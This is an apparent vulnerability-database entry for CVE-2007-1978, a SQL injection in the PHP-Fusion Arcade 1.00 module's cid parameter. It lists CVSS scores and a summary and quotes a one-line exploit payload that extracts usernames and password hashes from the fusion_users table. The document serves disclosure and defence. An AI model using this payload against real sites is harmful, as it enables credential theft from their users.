7.5
CVSSv2

CVE-2007-1978

Published: 12/04/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in the Arcade 1.00 module for PHP-Fusion allows remote malicious users to execute arbitrary SQL commands via the cid parameter in a view_game_list action.

Vulnerable Product Search on Vulmon Subscribe to Product

php fusion arcade module 1.00

Exploits

-------------------------------- PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln -------------------------------- Bulan: xoron xoronbiz -------------------------------- Exploit: indexphp?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/* --------------------- ...